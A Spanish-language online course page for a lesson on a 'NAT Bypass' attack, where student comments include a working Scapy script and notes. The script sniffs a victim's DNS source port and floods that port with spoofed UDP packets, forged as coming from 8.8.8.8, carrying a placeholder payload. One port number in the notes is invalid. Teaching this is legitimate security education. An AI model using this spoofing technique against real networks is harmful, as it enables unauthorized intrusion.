No tienes acceso a esta clase

¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera

Convierte tus certificados en títulos universitarios en USA

Antes: $249

Currency
$209

Paga en 4 cuotas sin intereses

Paga en 4 cuotas sin intereses
Suscríbete

Termina en:

18 Días
2 Hrs
44 Min
15 Seg

Ataque NAT Bypass

18/33
Recursos

Aportes 10

Preguntas 1

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad?

El curso es excelente, tan bueno y completo que llego a perderme en varias partes. Es para repasarlo una y otra vez. El contenido sí vale la pena.

Con el siguiente script se puede automatizar un poco el proceso:

#!/usr/bin/python3

from scapy.all import sniff, UDP, Ether, IP, sendp

port = 0
def print_summary(pkt):
    global port
    if pkt[UDP].sport != None:
        port=pkt[UDP].sport


while port == 0:
	packets = sniff(filter="dst host 8.8.8.8 and dst port 53 and src host 192.168.120.1 and udp", count=1, iface="eth0", timeout=1, prn=print_summary)


a = Ether()
b = IP(src="8.8.8.8", dst="192.168.120.1")
c = UDP(sport=53, dport=port)
d = r"Malicious payload"

packet = a/b/c/d
sendp(packet, loop=1, inter=3, iface="eth0")

en casi de que raw no te funciona

d = r"Esto podira ser codigo malicioso"

esto es por la versión que usa python

NATBYPASS

El ataque de NATBypass, nos permite aprovecharnos de una vulnerabilidad de este protocolo para, como su nombre lo indica, saltarnoslo y poder generar una conexión directa con el equipo a través de un puerto dado. El cual se deberá conocer a través de un comando que mencionaremos más adelante.

  1. El primer paso es crear el paquete falso con Scapy:

    a = Ether()
    b = IP(src="8.8.8.8", dst="192.168.120.1")  //src es la red que estamos falsificando y dst es la ip pública
    c= UDP(sport=53,dport=44576)  //dport es el puerto de la víctima.
    d = raw(bytes_encode("Aqui va el codigo malicioso"))
    packet =a/b/c/d
    
    

    Pero debemos ser rápidos si queremos que el ataque funcione, por lo que, una vez armado el paquete, ejecutamos el comando en nuestra máquina de ubuntu que nos permite conocer el puerto al que enviaremos la solicitud falsificaa.

    echo "Mensaje" | nc -vun 8.8.8.8 53
    								 ↓		 ↓			  	↓
    						   -Usa    -verbose -Puerto
    								Netcat -UDP			  DNS	
                           -No DNS
    								  		  Inverso         
    

Luego, en mi máquina atacante, reviso Wireshark en los registros DNS, valido el puerto en el protocolo UPD y lo añado al siguiente comando en sapy:

packet[UDP].dport= 535689 → puerto obtenido
sendp(packet,loop=1,inter=3,iface="eth0")

Se aprende muhco en cada clase.

Wow que interesante la manera de usar nat

Muy interesante la herramienta Scapy 🐍

Lo de raw me funciono con:

d = "Codigo malicioso"

Me quedó la duda, en que lenguaje debe estar escrito el código malicioso se puede insertar en el raw?